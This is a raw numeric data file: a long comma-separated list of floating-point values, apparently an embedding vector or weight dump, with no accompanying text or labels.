-0.014559155330061913, -0.008153126575052738, 0.002431040396913886, -0.008925100788474083, -0.04244501516222954, 0.0006521993782371283, 0.005982797127217054, -0.06533335894346237, 0.013712692074477673, -0.001427982235327363, -0.05447155609726906, 0.0014068207237869501, -0.02559702657163143, 0.02183196134865284, -0.02191322110593319, -0.020734945312142372, -0.009798649698495865, -0.007780683226883411, -0.021642353385686874, -0.043095096945762634, -0.05238587036728859, 0.010001800954341888, -0.007780683226883411, -0.0028017908334732056, -0.02868492156267166, -0.0051803505048155785, -0.00412396527826786, -0.03247707337141037, 0.038219474256038666, 0.012412525713443756, -0.004713103175163269, 0.0060945297591388226, -0.017308464273810387, -0.0029660046566277742, -0.006240121554583311, -0.0057322438806295395, -0.012473471462726593, -0.042472101747989655, 0.01789083145558834, 0.006334925536066294, 0.04927089065313339, 0.04672472923994064, 0.023700950667262077, 0.011586378328502178, -0.007279577665030956, 0.0402509830892086, 0.017850201576948166, -0.008444310165941715, -0.009162110276520252, 0.029037049040198326, -0.0120333107188344, 0.02345716953277588, 0.02076203189790249, -0.00952778197824955, 0.017091771587729454, -0.028061924502253532, -0.0062367357313632965, 0.010611253790557384, -0.05563628673553467, -0.035917095839977264, 0.03190825134515762, -0.03933003172278404, -0.00040101160993799567, -0.048783328384160995, 0.013089695945382118, -0.008803210221230984, -0.005942166782915592, 0.0001479193160776049, 0.07595138996839523, 0.019610842689871788, 0.005369958002120256, 0.0002968967310152948, 0.009480379521846771, -0.02282062917947769, -0.01454561110585928, -0.016929250210523605, -0.023484256118535995, 0.04420565813779831, -0.008451081812381744, 0.016550034284591675, -0.01260890532284975, -0.01572388783097267, 0.008857383392751217, -0.015561366453766823, -0.012791741639375687, -0.0006674356991425157, 0.022319523617625237, -0.013103239238262177, 0.005921851843595505, 0.014613328501582146, -0.01191819179803133, -0.024554183706641197, 0.011092044413089752, -0.021506918594241142, -0.008572972379624844, -0.00412396527826786, 0.026490889489650726, 0.008349506184458733, -0.013401194475591183, -0.02221117541193962, 0.04574960470199585, -0.01306938100606203, -0.042174145579338074, 0.004851922858506441, -0.0046758586540818214, 0.01913682371377945, -0.017389725893735886, -0.022184088826179504, -0.004682630300521851, 0.016956336796283722, 0.004730032291263342, 0.025190724059939384, -0.04992097243666649, -0.013556943275034428, -0.030526824295520782, 0.04824158921837807, -0.011213934980332851, -0.004256013315171003, 0.021317310631275177, -0.048322852700948715, 0.018419023603200912, -0.004398219287395477, 0.0229966938495636, 0.021493375301361084, -0.007990606129169464, -0.017836658284068108, 0.02676175907254219, 0.023795753717422485, 0.02808901108801365, -0.022021567448973656, -0.0043542031198740005, -0.014030962251126766, 0.004828222095966339, -0.04171367362141609, 0.0012959340820088983, -0.013103239238262177, -0.016008298844099045, 0.015642626211047173, -0.014125766232609749, -0.002117849187925458, 0.033993933349847794, -0.01990879699587822, 0.020030688494443893, -0.014274743385612965, -0.011180076748132706, 0.033750154078006744, 0.008545885793864727, -0.002588482340797782, -0.00607760064303875, 0.003346912795677781, 0.018947215750813484, 0.006111459340900183, -0.003155612153932452, 0.004374518059194088, 0.02722223475575447, 0.005420745816081762, 0.00005078774847788736, 0.015222781337797642, 0.014166396111249924, -0.014613328501582146, 0.0014322145143523812, 0.009913768619298935, -0.0018452882068231702, -0.01596766896545887, 0.025420961901545525, 0.006500831805169582, -0.0005899843527004123, -0.004127351101487875, 0.009913768619298935, -0.004323730245232582, 0.01103109959512949, -0.0042966436594724655, 0.022184088826179504, -0.0229154322296381, 0.011207163333892822, 0.038598690181970596, -0.013665290549397469, 0.01454561110585928, -0.027506645768880844, 0.02615230530500412, -0.009209511801600456, 0.011627009138464928, 0.009080849587917328, -0.023037323728203773, 0.023565515875816345, -0.00779422651976347, 0.015263412147760391, 0.01812106929719448, 0.011051414534449577, 0.0009124865755438805, -0.010699286125600338, -0.010441961698234081, 0.021804874762892723, -0.005959095899015665, 0.008769351057708263, -0.013678833842277527, 0.014830023050308228, 0.011945278383791447, -0.006917291320860386, 0.022427869960665703, -0.010787318460643291, -0.01667192578315735, -0.0052616107277572155, -0.029714219272136688, -0.03326259180903435, 0.016089558601379395, -0.002155093476176262, -0.005908308085054159, -0.03477945178747177, 0.0064500439912080765, 0.004726646468043327, 0.01122070662677288, -0.011078501120209694, 0.06500831991434097, -0.02166943997144699, -0.0035890010185539722, -0.009690302424132824, 0.023809297010302544, 0.012324494309723377, 0.022956062108278275, -0.011234249919652939, -0.0014406791888177395, -0.014085136353969574, 0.03190825134515762, 0.01400387566536665, -0.0202067531645298, 0.02199448086321354, 0.020409904420375824, -0.022075742483139038, -0.028278619050979614, -0.0016412907280027866, -0.027818143367767334, -0.004283100366592407, -0.003727820934727788, 0.0021855661179870367, -0.013360563665628433, 0.0026172620709985495, 0.004929797723889351, 0.020017145201563835, 0.044611960649490356, -0.020856836810708046, -0.0038192388601601124, -0.01673964224755764, 0.014897739514708519, 0.007225404027849436, -0.010868578217923641, -0.0028728938195854425, 0.010516449809074402, -0.0016395978163927794, -0.003968216013163328, 0.003396007465198636, -0.006141931749880314, -0.023470712825655937, 0.03147486224770546, -0.01904202066361904, 0.012629220262169838, -0.004923026077449322, -0.0384361706674099, 0.0026291124522686005, 0.0033875429071485996, 0.02204865589737892, -0.003985145594924688, 0.0280077513307333, -0.020816205069422722, 0.008843840099871159, -0.03897790610790253, 0.007943203672766685, -0.011599921621382236, -0.002881358377635479, -0.007354066241532564, -0.017647050321102142, 0.010658655315637589, -0.01713240146636963, 0.05271091312170029, -0.005410588346421719, 0.03136651590466499, 0.0008727028616704047, 0.020017145201563835, 0.005217595025897026, 0.01603538542985916, -0.023741580545902252, -0.016143733635544777, -0.016238536685705185, 0.05162744224071503, 0.0015634162118658423, -0.0039038851391524076, 0.0034112439025193453, -0.0015498728025704622, -0.035294100642204285, 0.012879773043096066, -0.006683667656034231, -0.0038192388601601124, -0.0307164303958416, -0.025732459500432014, -0.030201781541109085, 0.01729492098093033, 0.001052152831107378, -0.006934220902621746, -0.007286349311470985, 0.013644975610077381, 0.00813281163573265, -0.022495586425065994, 0.011721812188625336, 0.01705113984644413, 0.0010860114125534892, 0.03808404132723808, 0.012331265956163406, -0.019935885444283485, 0.03472527861595154, -0.007509815040975809, 0.020721402019262314, -0.006273979786783457, 0.056286368519067764, -0.044774480164051056, 0.03756939247250557, -0.0030438790563493967, 0.003484039567410946, 0.0054850769229233265, -0.00952101033180952, 0.027371210977435112, 0.025637656450271606, -0.005376729648560286, -0.02212991565465927, -0.03924877196550369, -0.0012129807146266103, -0.018107526004314423, 0.008058322593569756, 0.01156606338918209, 0.020030688494443893, 0.011992680840194225, 0.007848400622606277, 0.02613876201212406, 0.003815853036940098, 0.02105998620390892, 0.012933947145938873, -0.018838869407773018, -0.00613177428022027, -0.023579059168696404, -0.003091281047090888, -0.012195832096040249, -0.025786632671952248, 0.0009471915545873344, 0.0037007341161370277, 0.004171367269009352, -0.0027171445544809103, -0.012053625658154488, 0.00290167354978621, -0.0006801325944252312, 0.005190507974475622, 0.031203992664813995, -0.042174145579338074, 0.003859868971630931, 0.006466973572969437, 0.00825470220297575, -0.023782210424542427, 0.0014796163886785507, 0.01775539666414261, -0.03188116475939751, 0.015927039086818695, 0.042715884745121, -0.01588640734553337, 0.00047782808542251587, 0.03342511132359505, -0.025515764951705933, 0.026043958961963654, -0.028278619050979614, -0.003849711501970887, -0.01122747827321291, -0.01958375610411167, -0.02383638359606266, 0.016522947698831558, 0.00006311436300165951, -0.014220570214092731, 0.002461513038724661, 0.0071780020371079445, 0.0026172620709985495, -0.014017418958246708, -0.0035077405627816916, -0.02723577804863453, 0.003404472256079316, -0.0006488134968094528, 0.0006238428759388626, -0.012101028114557266, 0.02608458884060383, -0.009107936173677444, -0.005430903285741806, 0.003401086200028658, 0.008363049477338791, 0.011308738961815834, 0.016563577577471733, 0.009493923746049404, -0.013001663610339165, -0.008559429086744785, 0.00563405454158783, 0.001255303854122758, -0.013103239238262177, -0.03307298198342323, -0.0036465604789555073, 0.0404135063290596, 0.00975124817341566, 0.028197359293699265, -0.0037819943390786648, -0.009514238685369492, 0.015940582379698753, -0.023700950667262077, 0.007828084751963615, 0.010428418405354023, -0.03163738176226616, -0.015696801245212555, 0.016996966674923897, 0.027872316539287567, 0.001275619026273489, 0.0036025443114340305, -0.0017149329651147127, -0.00464538624510169, -0.01488419622182846, -0.040007203817367554, -0.013963245786726475, 0.015100890770554543, 0.010841491632163525, 0.005258224904537201, -0.02337590791285038, -0.01611664518713951, 0.0088302968069911, 0.004042705055326223, -0.014396633952856064, 0.010597710497677326, -0.013292847201228142, 0.00568822817876935, -0.00883706845343113, -0.004100264515727758, 0.008566200733184814, -0.003693962236866355, 0.004154438152909279, 0.03063517063856125, 0.015060260891914368, 0.011119130998849869, -0.011410314589738846, -0.03431897610425949, -0.009446521289646626, -0.02968713268637657, 0.01319804321974516, -0.01874406635761261, 0.005647597834467888, -0.003409550990909338, -0.006141931749880314, -0.004110421985387802, -0.0022312751971185207, -0.013001663610339165, -0.01065188366919756, -0.01492482703179121, 0.003568685846403241, -0.0061216168105602264, 0.03244998678565025, 0.027587905526161194, -0.004750347696244717, -0.0008147201733663678, -0.013739779591560364, 0.004235698375850916, -0.008464625105261803, -0.03263959288597107, -0.009690302424132824, -0.025651199743151665, -0.0107602309435606, 0.019001390784978867, 0.007218632381409407, 0.011288424022495747, -0.012710480950772762, -0.031285252422094345, 0.016631295904517174, 0.012310950085520744, 0.0062367357313632965, -0.00508893234655261, 0.0007478496409021318, 0.007509815040975809, 0.0005688227829523385, 0.03377724066376686, -0.017999177798628807, 0.015425932593643665, -0.006189333740621805, 0.01820232905447483, -0.03987177088856697, -0.03155612200498581, -0.02005777508020401, -0.020152579993009567, 0.007543673738837242, -0.02892870269715786, -0.013678833842277527, 0.0007415011641569436, 0.0006327307200990617, -0.0113764563575387, 0.02846822701394558, -0.037758998572826385, 0.025637656450271606, -0.006141931749880314, -0.026734670624136925, -0.0010098298080265522, 0.009331402368843555, -0.008363049477338791, -0.01611664518713951, -0.0005853287875652313, -0.009812192991375923, -0.020504707470536232, 0.01538530271500349, -0.020640142261981964, -0.019922342151403427, -0.008796438574790955, 0.023037323728203773, 0.011241021566092968, -0.03903207927942276, -0.004730032291263342, -0.004167981445789337, 0.02183196134865284, -0.02475733496248722, 0.020464077591896057, 0.03505031764507294, 0.03556496649980545, -0.016956336796283722, 0.004195068031549454, 0.01967856101691723, -0.03063517063856125, -0.003971601836383343, 0.0038124669808894396, 0.00952101033180952, 0.009148566983640194, -0.016401058062911034, -0.0382736474275589, -0.009107936173677444, -0.013123554177582264, -0.03001217357814312, -0.0022549761924892664, 0.007435326464474201, -0.0065177613869309425, 0.0021974167320877314, 0.0066735101863741875, 0.009507467038929462, -0.021886134520173073, -0.010922752320766449, 0.057803232222795486, -0.01680735871195793, -0.00642295740544796, 0.0034366378095000982, 0.006524533033370972, 0.017416812479496002, -0.002991398563608527, 0.007218632381409407, 0.028197359293699265, -0.022170545533299446, -0.0029863195959478617, -0.006737841293215752, -0.008220843970775604, -0.0006411953363567591, 0.0303101297467947, 0.007638477720320225, 0.0252178106456995, -0.001736941048875451, -0.013245444744825363, 0.024391664192080498, -0.02107352949678898, -0.018838869407773018, 0.01296103373169899, 0.0006047974457032979, 0.007347294595092535, -0.024364575743675232, -0.004201839677989483, -0.036377571523189545, 0.008891241624951363, -0.031962424516677856, -0.05336099490523338, -0.04081980884075165, -0.023091496899724007, 0.02822444587945938, 0.03402101993560791, 0.015642626211047173, 0.009365260601043701, 0.020017145201563835, 0.01798563450574875, -0.0176605936139822, -0.013590801507234573, -0.03995303064584732, -0.026504432782530785, 0.023186299949884415, 0.008505254983901978, -0.02452709712088108, 0.006277366075664759, -0.025028202682733536, 0.027046170085668564, 0.01307615265250206, -0.02483859471976757, 0.023118583485484123, -0.011132674291729927, -0.0025292299687862396, -0.012487014755606651, 0.022427869960665703, 0.0019045405788347125, 0.01812106929719448, -0.044693220406770706, 0.010191407985985279, 0.0028254918288439512, 0.01835130713880062, -0.01353662833571434, -0.008925100788474083, 0.0302288681268692, -0.030445562675595284, 0.006792014930397272, -0.014789393171668053, 0.018527371808886528, -0.015601996332406998, -0.04098232835531235, 0.01967856101691723, 0.015412389300763607, -0.0023108425084501505, -0.01261567696928978, -0.01114621851593256, -0.0039343577809631824, 0.00430002948269248, -0.004770662635564804, -0.017538702115416527, -0.02360614575445652, -0.04266171157360077, 0.038842469453811646, -0.010983697138726711, 0.008322419598698616, 0.002828877652063966, -0.017538702115416527, -0.004056248348206282, -0.00750304339453578, -0.014301829971373081, 0.009737704880535603, -0.011938506737351418, -0.023633232340216637, 0.0029236814007163048, -0.015574909746646881, -0.008613602258265018, -0.017633507028222084, -0.024351032450795174, -0.0019367061322554946, 0.0039919172413647175, 0.01767413690686226, -0.01099046878516674, 0.0017538702813908458, 0.006785243283957243, 0.010618025436997414, -0.0009632743312977254, 0.024581270292401314, -0.009317859075963497, 0.012737567536532879, 0.011945278383791447, -0.02575954608619213, -0.027899403125047684, -0.01966501586139202, -0.0017538702813908458, -0.0007783222827129066, 0.0008333423174917698, -0.032829202711582184, 0.0033401409164071083, -0.025651199743151665, 0.00493656937032938, 0.010191407985985279, 0.014681045897305012, -0.0215204618871212, 0.0018215873278677464, -0.009683530777692795, -0.027818143367767334, -0.008999588899314404, -0.002779782749712467, -0.0046860165894031525, 0.07611390948295593, -0.02005777508020401, 0.012927175499498844, 0.01866280473768711, 0.011159761808812618, -0.015642626211047173, 0.02468961849808693, 0.0022211174946278334, 0.0008663543849252164, -0.005661141127347946, 0.008227615617215633, -0.002385331317782402, 0.023281104862689972, 0.0036838047672063112, 0.001119023421779275, 0.01913682371377945, -0.00016876346489880234, -0.016644839197397232, 0.011769214645028114, 0.00567129859700799, -0.0005209976807236671, -0.006490674335509539, -0.011037871241569519, 0.011505118571221828, 0.00034408699139021337, -0.015033174306154251, -0.009419434703886509, -0.006910519674420357, 0.01492482703179121, -0.009866367094218731, 0.0006602407665923238, -0.016143733635544777, 0.009263685904443264, -0.019841080531477928, 0.013922614976763725, 0.03385850042104721, 0.0001403011556249112, -0.03415645286440849, 0.012778197415173054, -0.031501948833465576, -0.013793952763080597, 0.0011071729240939021, 0.00975124817341566, 0.029578786343336105, -0.0101033765822649, -0.019854623824357986, -0.021737156435847282, 0.01477584894746542, -0.005769488401710987, 0.0028593502938747406, -0.0006119923782534897, -0.021506918594241142, 0.0073676095344126225, 0.022969605401158333, -0.01611664518713951, 0.02868492156267166, 0.013976789079606533, -0.02166943997144699, -0.006297681014984846, 0.011742128059267998, -0.017010509967803955, -0.004682630300521851, -0.009114707820117474, -0.003169155679643154, -0.01133582554757595, 0.00813281163573265, -0.005092318169772625, -0.0024902927689254284, -0.02993091382086277, 0.02158818021416664, 0.0331813283264637, 0.008044779300689697, -0.00952778197824955, -0.010408102534711361, 0.0007393849664367735, 0.0018114297417923808, 0.0026545063592493534, 0.015304042026400566, 0.013367335312068462, -0.016861533746123314, 0.006439886521548033, -0.0059320093132555485, -0.02158818021416664, -0.00727280555292964, 0.001119023421779275, 0.026477346196770668, -0.021547548472881317, -0.007462413515895605, 0.0558529831469059, -0.0017657207790762186, 0.023416537791490555, 0.031203992664813995, -0.007042568176984787, 0.012866229750216007, 0.013590801507234573, 0.02097872644662857, 0.0060471282340586185, 0.018297133967280388, -0.04696851223707199, -0.02708679996430874, 0.009053763002157211, 0.004394833464175463, 0.014762305654585361, 0.027655621990561485, -0.00860005896538496, 0.008694862946867943, 0.02460835687816143, 0.012710480950772762, -0.0003506470820866525, 0.013834582641720772, -0.009669987484812737, -0.006734455469995737, 0.017105314880609512, -0.014748762361705303, -0.0017961934208869934, 0.01789083145558834, 0.02467607520520687, 0.028739094734191895, 0.014044505544006824, -0.006040356587618589, -0.014789393171668053, -0.006544847972691059, 0.016062472015619278, -0.005776260048151016, 0.030662257224321365, 0.019014934077858925, -0.012087484821677208, -0.011308738961815834, 0.01874406635761261, 0.014938370324671268, 0.01859508827328682, 0.01372623536735773, 0.01172858476638794, 0.012805284932255745, -0.00727280555292964, 0.005776260048151016, 0.002473363419994712, 0.026721127331256866, 0.012974577024579048, -0.0043542031198740005, -0.01898784749209881, 0.033912673592567444, -0.0037819943390786648, 0.013827810995280743, -0.006710754707455635, -0.013841354288160801, -0.012277091853320599, 0.027818143367767334, 0.03594418242573738, -0.003054036758840084, 0.00441514840349555, -0.025163637474179268, 0.01572388783097267, 0.020084861665964127, -0.015060260891914368, -0.004621685016900301, 0.014504981227219105, 0.0028695077635347843, 0.002437812043353915, 0.00999502930790186, 0.021100617945194244, 0.004256013315171003, -0.0064263432286679745, 0.023728037253022194, 0.005369958002120256, 0.018066896125674248, -0.014681045897305012, -0.028495313599705696, -0.0024259614292532206, -0.004895939026027918, 0.010834719985723495, -0.003440023632720113, -0.017619963735342026, 0.028116097673773766, -0.010272668674588203, 0.0035009689163416624, 0.004432077519595623, -0.004537038970738649, 0.03540244698524475, 0.0024598201271146536, -0.015019630081951618, 0.013157413341104984, -0.008552657440304756, 0.010590938851237297, 0.009019904769957066, -0.017091771587729454, -0.007977062836289406, 0.018419023603200912, -0.03626922518014908, -0.004408376757055521, -0.006995166186243296, 0.038598690181970596, -0.012182287871837616, -0.016631295904517174, 0.02922665700316429, 0.02838696539402008, -0.02708679996430874, -0.01867634803056717, 0.0038937274366617203, -0.010638340376317501, 0.006409414112567902, -0.030039260163903236, -0.010888893157243729, 0.008268245495855808, -0.013563714921474457, -0.022035112604498863, 0.007022252772003412, 0.0052954694256186485, -0.010597710497677326, 0.007936432026326656, 0.017633507028222084, -0.020003601908683777, -0.0005548561457544565, -0.010611253790557384, 0.024797964841127396, -0.0037887662183493376, -0.02030155621469021, -0.01928580179810524, 0.020396361127495766, -0.034996144473552704, 0.004218769259750843, 0.03077060543000698, -0.016929250210523605, 0.009311087429523468, 0.02005777508020401, 0.014965456910431385, 0.00971738900989294, -0.0101033765822649, 0.026247108355164528, 0.025488678365945816, 0.0017403268720954657, 0.014044505544006824, -0.010198180563747883, -0.009121479466557503, -0.004432077519595623, -0.0021720228251069784, 0.021168334409594536, 0.002014580648392439, -0.01958375610411167, 0.030445562675595284, 0.018242958933115005, 0.02607104554772377, -0.0045201098546385765, -0.0069206771440804005, -0.002182180294767022, -0.00019521541253197938, 0.017863744869828224, -0.008654232136905193, -0.012114571407437325, 0.007767139934003353, 0.007821313105523586, -0.010855034925043583, 0.034129366278648376, -0.029362091794610023, -0.007604619022458792, 0.04019680991768837, -0.02676175907254219, 0.03458984196186066, 0.023159213364124298, -0.025163637474179268, -0.0010487670078873634, -0.02390410006046295, 0.022333066910505295, -0.010848263278603554, -0.009148566983640194, 0.005911693908274174, -0.004022389650344849, -0.009236598387360573, 0.009568411856889725, 0.001485541695728898, 0.007015481125563383, -0.014532067812979221, 0.002290527569130063, -0.011369683779776096, -0.01376686617732048, 0.02298315055668354, 0.027506645768880844, -0.022874802350997925, 0.000710605236236006, -0.01659066416323185, -0.00872194953262806, 0.00906053464859724, 0.006114845164120197, -0.012094256468117237, 0.029280830174684525, -0.03342511132359505, -0.024554183706641197, -0.006602407433092594, -0.024134337902069092, 0.007970291189849377, -0.005952324252575636, 0.01500608678907156, 0.020179666578769684, -0.022251805290579796, -0.018337763845920563, 0.030418476089835167, 0.0023125356528908014, 0.011654095724225044, -0.006351854652166367, 0.0023684019688516855, 0.02097872644662857, 0.014166396111249924, 0.011004012078046799, -0.0031471475958824158, -0.031826991587877274, 0.00030388004961423576, 0.0017928075976669788, -0.03280211612582207, 0.0013230209005996585, -0.002473363419994712, 0.0004225964075885713, -0.0018046580953523517, 0.006006497889757156, 0.019299345090985298, -0.004425305873155594, 0.0023819454945623875, 0.025637656450271606, -0.015317585319280624, 0.006060671526938677, 0.006852960214018822, -0.0165094044059515, -0.008525569923222065, -0.015547823160886765, -0.03217911720275879, -0.00011607116903178394, -0.03171864151954651, 0.0046521578915417194, 0.005701771471649408, 0.005860906094312668, -0.015480105765163898, -0.005339485593140125, -0.01353662833571434, 0.008728721179068089, -0.023321734741330147, -0.0025800177827477455, -0.02422914281487465, 0.006375555414706469, -0.004445620812475681, -0.02444583736360073, 0.014098679646849632, -0.01659066416323185, 0.03561914339661598, 0.007604619022458792, -0.010394559241831303, -0.0190555639564991, 0.0011689646635204554, 0.004056248348206282, -0.008302103728055954, -0.033452197909355164, -0.02175069972872734, 0.00193332030903548, 0.013719463720917702, 0.007570760790258646, 0.0012282170355319977, -0.0008240312454290688, 0.0019807221833616495, -0.010130463168025017, -0.0009107936639338732, -0.004489636979997158, -0.007780683226883411, -0.017186574637889862, 0.017010509967803955, -0.02753373235464096, -0.0038767983205616474, 0.012209375388920307, -0.007970291189849377, 0.01581869088113308, 0.018635718151926994, 0.01469458919018507, -0.006775085814297199, -0.009839280508458614, -0.016224993392825127, -0.0069308350794017315, -0.0028525786474347115, 0.00007358933362411335, 0.0037989236880093813, 0.004635228775441647, 0.003981759771704674, -0.012392210774123669, -0.0010690821800380945, -0.003555142553523183, -0.05143783241510391, 0.009507467038929462, 0.013407966122031212, -0.023795753717422485, 0.010658655315637589, -0.012547959573566914, -0.00563405454158783, -0.0032131716143339872, 0.015561366453766823, -0.0051058619283139706, 0.009168881922960281, -0.009771563112735748, 0.026707584038376808, -0.027289951220154762, 0.06430406123399734, 0.009040219709277153, -0.016766728833317757, -0.025271983817219734, -0.0019502495415508747, 0.03385850042104721, -0.018161699175834656, 0.006659966893494129, 0.004350817296653986, -0.02114124782383442, -0.006636266130954027, -0.01319804321974516, -0.012107799760997295, 0.012791741639375687, -0.017010509967803955, 0.005667912773787975, 0.023714493960142136, 0.003978373948484659, 0.008633917197585106, -0.004879009909927845, 0.004618299193680286, 0.019651472568511963, 0.020111948251724243, -0.02876618131995201, 0.013963245786726475, 0.0032351796980947256, 0.006365397945046425, -0.005711928941309452, -0.008207300677895546, 0.0070696547627449036, -0.02692427858710289, -0.008058322593569756, 0.003404472256079316, -0.001100401277653873, -0.013035522773861885, 0.0016150504816323519, 0.0004242893191985786, 0.0006411953363567591, -0.004980585537850857, 0.032206203788518906, 0.016482317820191383, -0.0037176632322371006, -0.017728310078382492, -0.02422914281487465, 0.018256502225995064, 0.004625071305781603, 0.0002990128705278039, -0.012988120317459106, 0.013137097470462322, -0.006836031097918749, -0.013340248726308346, -0.0052142092026770115, -0.001030991319566965, -0.007523358799517155, -0.026951365172863007, 0.01504671759903431, 0.003409550990909338, 0.02592206746339798, 0.002415803959593177, 0.01419348269701004, 0.01874406635761261, -0.0069545358419418335, 0.009162110276520252, 0.0061791762709617615, 0.017647050321102142, -0.001806351006962359, 0.007103513460606337, 0.009615814313292503, 0.008363049477338791, 0.005366572178900242, 0.02253621816635132, 0.022563304752111435, 0.004408376757055521, -0.0036905764136463404, 0.010665427893400192, 0.01952958293259144, -0.009446521289646626, 0.0022160387597978115, 0.002517379354685545, 0.012073940597474575, -0.0003790035843849182, -0.028251532465219498, 0.005705157294869423, -0.02376866713166237, -0.011850475333631039, 0.0015947353094816208, 0.004235698375850916, -0.0007381152827292681, 0.0017335552256554365, -0.022549761459231377, 0.022333066910505295, -0.0020078090019524097, -0.006659966893494129, -0.006175790447741747, 0.023714493960142136, 0.03339802473783493, -0.00813281163573265, -0.005762716755270958, 0.029876740649342537, 0.010475819930434227, 0.013793952763080597, 0.00025944074150174856, -0.011701497249305248, 0.013678833842277527, -0.013021979480981827, -0.026436716318130493, -0.020707858726382256, 0.008430766873061657, -0.007834856398403645, 0.028061924502253532, 0.03919459879398346, -0.04499117285013199, 0.016996966674923897, 0.0032453371677547693, 0.0053191701881587505, -0.008593287318944931, 0.01079409010708332, -0.004625071305781603, 0.010028887540102005, 0.002957539865747094, -0.0014914668863639235, -0.01029298361390829, -0.004083334933966398, 0.018256502225995064, 0.005617124959826469, -0.014626871794462204, -0.00021542470494750887, -0.0023260789457708597, -0.0216017235070467, -0.009053763002157211, 0.014179939404129982, -0.0020653684623539448, -0.0011114052031189203, -0.003568685846403241, -0.01812106929719448, -0.009311087429523468, 0.012988120317459106, -0.007117056753486395, -0.04474739357829094, 0.01319804321974516, -0.006869889795780182, -0.01469458919018507, -0.000980203622020781, 0.00572547223418951, -0.014789393171668053, 0.010902437381446362, -0.00813281163573265, 0.0009768176823854446, 0.02598978392779827, 0.002092455280944705, 0.01172858476638794, -0.00006581245543202385, -0.0006847881595604122, 0.004923026077449322, -0.0007436173036694527, -0.004770662635564804, -0.0070696547627449036, -0.00107500737067312, -0.0031623838003724813, -0.026409629732370377, -0.006456816103309393, -0.01657712087035179, -0.0167531855404377, 0.0014008954167366028, -0.010631568729877472, 0.0031505334191024303, 0.00596248172223568, 0.0188117828220129, 0.004794363398104906, 0.002595253987237811, -0.0005154956597834826, -0.005559565499424934, -0.0017894216580316424, 0.013746551238000393, 0.0017589490162208676, 0.021263137459754944, 0.02074848860502243, -0.0017200118163600564, -0.003434944897890091, -0.010360701009631157, 0.004916253965348005, 0.01827004738152027, -0.0015244790120050311, 0.015561366453766823, 0.012459928169846535, 0.009168881922960281, 0.015832234174013138, -0.0033367550931870937, -0.000814296945463866, -0.01952958293259144, -0.02646380290389061, -0.00508893234655261, 0.0010513063753023744, -0.03989885747432709, 0.02004423178732395, 0.020477620884776115, 0.036215052008628845, 0.0049907430075109005, 0.000899789622053504, -0.0016302868025377393, -0.025867894291877747, -0.0034941972699016333, 0.010699286125600338, 0.016780272126197815, 0.019475409761071205, 0.012365124188363552, 0.022333066910505295, 0.018188785761594772, 0.004730032291263342, -0.012256776914000511, 0.00007808616646798328, 0.01145771611481905, -0.027032626792788506, -0.027791056782007217, -0.004672472830861807, -0.0009531167452223599, -0.0016946179093793035, 0.0010919366031885147, -0.010238810442388058, 0.002793326275423169, -0.013123554177582264, -0.012256776914000511, -0.00441514840349555, -0.0089521873742342, -0.0004287332412786782, 0.02375512383878231, 0.0014017418725416064, 0.002568167168647051, -0.009195968508720398, 0.007977062836289406, 0.016089558601379395, 0.0005328481202013791, -0.03385850042104721, 0.006744612939655781, -0.0032131716143339872, 0.012764654122292995, 0.013435052707791328, -0.00744209811091423, 0.003401086200028658, -0.012784969992935658, 0.047645680606365204, -0.01400387566536665, -0.013780409470200539, -0.002161865122616291, -0.002346394117921591, 0.020409904420375824, -0.008166669867932796, -0.03193533793091774, -0.013035522773861885, -0.009344945661723614, 0.011132674291729927, 0.02784522995352745, -0.006378941237926483, 0.0030557296704500914, 0.0015024709282442927, 0.01180984452366829, 0.0379486083984375, 0.001577806076966226, -0.002359937410801649, 0.016373969614505768, -0.006710754707455635, 0.007218632381409407, -0.0023937958758324385, 0.011538976803421974, -0.004489636979997158, 0.01874406635761261, 0.01959729939699173, -0.017552245408296585, 0.008532341569662094, 0.013015206903219223, -0.01500608678907156, 0.015331128612160683, 0.02559702657163143, 0.010360701009631157, 0.006341697182506323, -0.0070357960648834705, 0.019962972030043602, -0.009507467038929462, -0.013868441805243492, -0.011417086236178875, -0.01102432794868946, -0.014356004074215889, -0.013170956633985043, -0.008870926685631275, -0.0032301009632647038, 0.012222918681800365, 0.021886134520173073, 0.019570212811231613, -0.0071441433392465115, 0.010618025436997414, 0.011836931109428406, -0.0002247357915621251, -0.03342511132359505, 0.018527371808886528, 0.007347294595092535, 0.006270593963563442, 0.006135160103440285, -0.025055289268493652, 0.0017157794209197164, -0.007191545329988003, -0.025028202682733536, 0.002969390479847789, -0.00521082291379571, -0.007137371692806482, 0.004499794449657202, 0.004411762580275536, 0.009209511801600456, -0.01126810908317566, 0.00139327731449157, 0.0029219884891062975, -0.008572972379624844, -0.006690439768135548, -0.003649946302175522, -0.0038767983205616474, 0.007570760790258646, 0.018933672457933426, -0.008288560435175896, 0.008925100788474083, 0.009893453679978848, -0.0066531952470541, -0.02984965406358242, -0.01260890532284975, -0.009317859075963497, 0.02383638359606266, -0.007306664250791073, -0.010171093046665192, 0.0005053381319157779, 0.009311087429523468, 0.011972365900874138, -0.004042705055326223, -0.02784522995352745, 0.0006361165433190763, -0.01797209121286869, -0.006741227116435766, 0.0008578897104598582, 0.008126039989292622, 0.020274469628930092, 0.014030962251126766, 0.00539704505354166, -0.00002667679473233875, -0.006412799935787916, 0.016468774527311325, 0.005921851843595505, -0.006297681014984846, 0.0018452882068231702, 0.018324220553040504, 0.0188117828220129, -0.003561914199963212, -0.004147666040807962, -0.006473745219409466, 0.01273079589009285, -0.01611664518713951, -0.011396771296858788, -0.008911557495594025, 0.009385576471686363, -0.01744389906525612, 0.021046442911028862, 0.0006340004038065672, 0.010665427893400192, 0.011200391687452793, -0.007665564306080341, 0.0017174724489450455, 0.021249594166874886, -0.0061453175731003284, -0.0027510030195116997, 0.0036093161907047033, 0.021466288715600967, -0.00033096683910116553, 0.005393659230321646, 0.0060132695361971855, -0.01912328042089939, -0.01099724043160677, -0.016550034284591675, 0.02515009418129921, 0.0022024954669177532, 0.011593149974942207, -0.01682090200483799, 0.01966501586139202, -0.005976025015115738, -0.00048375330516137183, -0.004614913370460272, 0.023335278034210205, -0.010265897028148174, 0.011633780784904957, 0.011478031054139137, 0.018324220553040504, -0.013435052707791328, -0.01052999310195446, -0.0027273022569715977, 0.025813721120357513, -0.017159488052129745, -0.024500010535120964, -0.009236598387360573, -0.010956610552966595, -0.02622002176940441, -0.014626871794462204, 0.017024053260684013, -0.00929754413664341, -0.012866229750216007, -0.00779422651976347, 0.010807633399963379, -0.02245495654642582, -0.015033174306154251, 0.02221117541193962, -0.009304315783083439, 0.007665564306080341, -0.02153400518000126, -0.006033584475517273, -0.005099090281873941, 0.006243507377803326, 0.0011334132868796587, 0.0005108400946483016, 0.011471259407699108, 0.00003899017974617891, 